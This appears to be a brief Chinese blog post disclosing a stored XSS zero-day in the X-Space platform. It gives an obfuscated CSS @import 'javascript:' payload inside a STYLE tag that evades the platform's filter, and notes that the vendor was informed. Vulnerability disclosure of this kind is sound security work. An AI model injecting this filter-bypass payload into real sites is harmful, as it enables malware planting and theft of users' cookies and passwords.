标签 ‘X-Space’ 下的日志

X-Space XSS 0Day

作者:茄子宝
来源:茄子乱语

直接用日志显示源代码方式编辑写入


XSS

<P><STRONG>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

</STRONG></P>

此处脚本漏洞存在有一定的风险,可能导致挂马,威胁到用户,密码,COOKIE等敏感信息,已通知官方处理等待更新程序.

Tags: ,